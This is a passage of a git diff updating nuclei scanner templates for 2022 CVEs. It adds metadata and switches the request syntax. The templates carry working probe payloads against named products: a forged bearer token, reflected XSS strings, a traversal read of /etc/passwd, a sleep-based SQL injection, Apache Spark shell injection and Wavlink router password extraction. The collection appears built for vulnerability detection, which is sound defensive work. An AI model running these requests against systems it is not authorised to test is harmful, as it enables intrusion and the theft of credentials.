cve,cve2022,lin-cms,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/cms/admin/group/all" + headers: + Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"id":' + - '"name":' + - '"level":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + + - type: word + part: body + words: + - '<html' + - '<body' + - '<script' + negative: true +# digest: 4a0a00473045022100bdeff498f1f612fac7529406701fa2c1f6c36e0a20d7c8938adf45c40af8e88402204ebb5a59a63fafab1d1db6752328c1c4b67009af43da014df47524912c3ca82b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32770.yaml b/nuclei-templates/CVE-2022/CVE-2022-32770.yaml index 8eb2c1da0d..8a03aa579d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32770.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32770.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql @@ -15,12 +19,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32770 cwe-id: CWE-79 + epss-score: 0.00103 + epss-percentile: 0.41592 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wwbn + product: avideo shodan-query: http.html:"AVideo" - verified: "true" - tags: cve,cve2022,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E" @@ -40,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a0046304402205070fa2cc17c809a810baa1e6b6c9efb5acdfa42715da7c7f2d6cf0b62934576022045e59a8169ca884549c6f435801ed6873531f867ccc9de4433c0f251a1fa050f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32771.yaml b/nuclei-templates/CVE-2022/CVE-2022-32771.yaml index 1f88718ad7..99d9a0c458 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32771.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32771.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://nvd.nist.gov/vuln/detail/CVE-2022-32771 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32771 cwe-id: CWE-79 + epss-score: 0.00074 + epss-percentile: 0.30395 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wwbn + product: avideo shodan-query: http.html:"AVideo" - verified: "true" - tags: cve,cve2022,avideo,xss + tags: cve,cve2022,avideo,xss,wwbn -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E" @@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a0046304402205cd915db0a5e75b5298087a9d97667756ac6598deed750cf8ae835d0fb3052370220337036c281cbdf23199d21ac1cf6cf370e1cb4aecf7531ed418daf886f164cf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32772.yaml b/nuclei-templates/CVE-2022/CVE-2022-32772.yaml index 1fbbc00bbf..77d222d80a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32772.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32772.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql @@ -15,12 +19,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32772 cwe-id: CWE-79 + epss-score: 0.00056 + epss-percentile: 0.21026 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wwbn + product: avideo shodan-query: http.html:"AVideo" - verified: "true" - tags: cve,cve2022,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E" @@ -40,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502200250c5a4a2f2f305db862778645d4302544e55e4d9df38285ae08572bbb8461c022100d024e870443986b8f5a4c16ed8f86c0807f0369aea5fbaa7f1dfde75e0c0bb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-33119.yaml b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml index c147ddcde0..223c8ed044 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-33119.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml @@ -1,38 +1,23 @@ id: CVE-2022-33119 - info: - name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting + name: NVRsolo v03.06.02 - Cross-Site Scripting author: arafatansari severity: medium description: | - NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. + NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php. reference: - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/badboycxcc/badboycxcc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 - epss-score: 0.0157 - epss-percentile: 0.86981 - cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: nuuo - product: nvrsolo_firmware shodan-query: http.html:"NVRsolo" - tags: cve,cve2022,nvrsolo,xss,nuuo - -http: + verified: "true" + tags: cve,cve2022,nvrsolo,xss +requests: - raw: - | POST /login.php HTTP/1.1 @@ -41,12 +26,10 @@ http: Referer: "><script>alert(document.domain)</script><" language=en&user=user&pass=pass&submit=Login - matchers: - type: dsl dsl: - - 'contains(header, "text/html")' + - 'contains(all_headers, "text/html")' - 'status_code == 200' - contains(body,'<script>alert(document.domain)</script><\"?cmd=') condition: and -# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-33891.yaml b/nuclei-templates/CVE-2022/CVE-2022-33891.yaml index 1ecb9899b9..0e8cd9ebfd 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-33891.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-33891.yaml @@ -1,32 +1,43 @@ id: CVE-2022-33891 + info: - name: Apache Spark UI - Command Injection + name: Apache Spark UI - Remote Command Injection author: princechaddha severity: high description: | - The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. + Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. + remediation: | + Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability. reference: - https://github.com/W01fh4cker/cve-2022-33891 - - https://nvd.nist.gov/vuln/detail/CVE-2022-33891 - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-33891 + - http://www.openwall.com/lists/oss-security/2023/05/02/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-33891 - cwe-id: CWE-77 + cwe-id: CWE-78 + epss-score: 0.97289 + epss-percentile: 0.99851 + cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: apache + product: spark shodan-query: title:"Spark Master at" - verified: "true" - tags: packetstorm,cve,cve2022,apache,spark,authenticated - + tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm variables: command: "echo CVE-2022-33891 | rev" -requests: +http: - method: GET path: - - '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`' + - '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`' matchers-condition: and matchers: @@ -34,3 +45,4 @@ requests: part: body words: - "19833-2202-EVC" +# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-33901.yaml b/nuclei-templates/CVE-2022/CVE-2022-33901.yaml index 079bedd9c4..2294352f6f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-33901.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-33901.yaml @@ -1,41 +1,54 @@ id: CVE-2022-33901 info: - name: MultiSafepay plugin for WooCommerce <= 4.13.1 - Unauthenticated Arbitrary File Read + name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read author: theamanrawat severity: high description: | - Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress. + WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system. + remediation: | + Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later. reference: - https://wordpress.org/plugins/multisafepay/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-33901 - https://wordpress.org/plugins/multisafepay/#developers - https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2022-33901 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-33901 + epss-score: 0.00779 + epss-percentile: 0.80981 + cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce + verified: true + max-request: 1 + vendor: multisafepay + product: multisafepay_plugin_for_woocommerce + framework: wordpress + tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce -requests: +http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word part: header words: - "application/octet-stream" + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 +# digest: 490a0046304402202ae9ccfcd2d44fcb8006ba953a197c97d4ecfacdad1348585abddafee07bb83102204e83d79dbe8ee0856aa30e9d9833f4f2d553fd603b0952a23e5c83d208c62401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-33965.yaml b/nuclei-templates/CVE-2022/CVE-2022-33965.yaml index 28c11b0507..a7b0e3bfcc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-33965.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-33965.yaml @@ -6,40 +6,51 @@ info: severity: critical description: | WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. + remediation: | + Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability. reference: - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities - https://wordpress.org/plugins/wp-stats-manager/ - https://wordpress.org/plugins/wp-stats-manager/#developers - https://nvd.nist.gov/vuln/detail/CVE-2022-33965 + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-33965 cwe-id: CWE-89 + epss-score: 0.01233 + epss-percentile: 0.83986 + cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 + vendor: plugins-market + product: wp_visitor_statistics + framework: wordpress google-query: inurl:"/wp-content/plugins/wp-stats-manager" - verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager + tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market -requests: +http: - raw: - | @timeout: 15s - GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1 + GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - type: regex regex: - - "^1331' and sleep\\(5\\) or '$" + - "^1331' and sleep\\(7\\) or '$" - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a004630440220458bd56d4667cfa3e15751e8422d0ba54e709c7e9d7a857053c0307e24cdaa8302205b0be1ac0171f03bb15ec954e402ff2fba222f6711aa86faffac17ebffc02f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34045.yaml b/nuclei-templates/CVE-2022/CVE-2022-34045.yaml index 57a05f35dd..c894429126 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34045.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34045.yaml @@ -6,20 +6,32 @@ info: severity: critical description: | WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing - https://nvd.nist.gov/vuln/detail/CVE-2022-34045 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-34045 cwe-id: CWE-798 + epss-score: 0.05662 + epss-percentile: 0.93156 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn530hg4_firmware shodan-query: http.html:"WN530HG4" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - raw: - | GET /backupsettings.dat HTTP/1.1 @@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a00473045022100fb0b8aa54fde332f8cd44ca55dfda68ee8eaad6e9c47f58cd20feb3873a04ac402206045d384f557a00bd359d936396b51e46a94bd70a5ff2e253f622d481a211aab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34046.yaml b/nuclei-templates/CVE-2022/CVE-2022-34046.yaml index b1060a2f78..0e55de9a03 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34046.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34046.yaml @@ -1,43 +1,22 @@ id: CVE-2022-34046 - info: - name: WAVLINK WN533A8 - Improper Access Control + name: Wavlink Sysinit.shtml - Password Exposure author: For3stCo1d severity: high description: | - WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network. - remediation: | - Apply the latest firmware update provided by the vendor to fix the access control issue. + An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);]. reference: - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 - - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-34046 - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-34046 - cwe-id: CWE-863 - epss-score: 0.14292 - epss-percentile: 0.95577 - cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 - vendor: wavlink - product: wn533a8_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,packetstorm,wavlink,router,exposure - -http: + tags: cve,cve2022,wavlink,router,exposure +requests: - raw: - | GET /sysinit.shtml?r=52300 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -46,13 +25,10 @@ http: - 'var syspasswd="' - '<title>APP' condition: and - - type: status status: - 200 - extractors: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34048.yaml b/nuclei-templates/CVE-2022/CVE-2022-34048.yaml index 2f5e680805..7292a945a4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34048.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34048.yaml @@ -1,16 +1,15 @@ id: CVE-2022-34048 - info: - name: Wavlink WN-533A8 - Cross-Site Scripting + name: Wavlink WN533A8 - Cross-Site Scripting (XSS) author: ritikchaddha severity: medium description: | - Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. + Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter. reference: - https://www.exploit-db.com/exploits/50989 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing - - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -19,8 +18,7 @@ info: metadata: shodan-query: http.html:"Wavlink" verified: "true" - tags: cve2022,wavlink,xss,router,edb,cve - + tags: cve,cve2022,wavlink,xss,router requests: - raw: - | @@ -28,21 +26,16 @@ requests: Host: {{Hostname}} newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en - matchers-condition: and matchers: - type: word part: body words: - 'x");alert(9);x=("?login=0");' - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-34093.yaml b/nuclei-templates/CVE-2022/CVE-2022-34093.yaml index b44f12cab0..d7d192cc8f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34093.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34093.yaml @@ -11,20 +11,21 @@ info: - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44 - https://owasp.org/www-community/attacks/xss/ - https://softwarepublico.gov.br/social/i3geo + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-34093 cwe-id: CWE-79 - epss-score: 0.00261 - epss-percentile: 0.63669 + epss-score: 0.00266 + epss-percentile: 0.65533 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: softwarepublico product: i3geo - tags: cve,cve2022,i3geo,xss + tags: cve,cve2022,i3geo,xss,softwarepublico http: - method: GET @@ -38,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4b0a00483046022100ba421a094b5405c2df154ded3c6d3c4cef76af070583e1e95425e4625f055658022100c5996c8b475f50f29c1beadde4ea2385e6048f318a4ccb18620f1ca87292e7ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6c16f44954588e4bae35bb1d81fb7146230861817ce49f5a3de2f00e70a282a02204ac735c905d496f7e25c3534786304a13f57730db0a36a2c722fa4471bb64fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34094.yaml b/nuclei-templates/CVE-2022/CVE-2022-34094.yaml index 2397f80f51..41df93a9f5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34094.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34094.yaml @@ -11,20 +11,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-34093 - https://owasp.org/www-community/attacks/xss/ - https://softwarepublico.gov.br/social/i3geo + - https://github.com/wagnerdracha/ProofOfConcept classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-34094 cwe-id: CWE-79 - epss-score: 0.00261 - epss-percentile: 0.63669 + epss-score: 0.00266 + epss-percentile: 0.65533 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: softwarepublico product: i3geo - tags: cve,cve2022,i3geo,xss + tags: cve2022,cve,i3geo,xss,softwarepublico http: - method: GET @@ -38,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4a0a00473045022100cca7d3036abd1b10ca87f783573b0b9a2abd2580718314465d3006bae2c006d202204c47a5aecd0fdebe9f7090b0dfab1a05a8770b87ffa85ee047b952d3897b8697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae011287587c98e490b0c70b0c3ea88250a2b29a79c656693b056f3adbda9acd022035c0bf42383d419c05913b95afad80e3a7bf9eecc3689f24b92069aff39fc3af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34121.yaml b/nuclei-templates/CVE-2022/CVE-2022-34121.yaml index 3f232fdcd0..6c023aa399 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-34121.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-34121.yaml @@ -6,20 +6,32 @@ info: severity: high description: | Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. + remediation: | + Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability. reference: - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates - https://github.com/CuppaCMS/CuppaCMS/issues/18 - https://nvd.nist.gov/vuln/detail/CVE-2022-34121 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-34121 cwe-id: CWE-829 + epss-score: 0.66943 + epss-percentile: 0.97855 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,lfi,cuppa,cms + verified: true + max-request: 1 + vendor: cuppacms + product: cuppacms + tags: cve,cve2022,lfi,cuppa,cms,cuppacms -requests: +http: - raw: - | POST /templates/default/html/windows/right.php HTTP/1.1 @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100c5726ce028ac359181e6ce2ccd45251d4715c1c9c936d2ef67b588f2159e7cc9022100c49a6fcb006b5de199ccc32a6d1716a713f8de4f24346ba4578c705b4f225245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-34265.yaml b/nuclei-templates/CVE-2022/CVE-2022-34265.yaml deleted file mode 100644 index 676cc1637e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-34265.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-34265 - -info: - name: Django - SQL injection - author: princechaddha - severity: critical - description: | - An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to 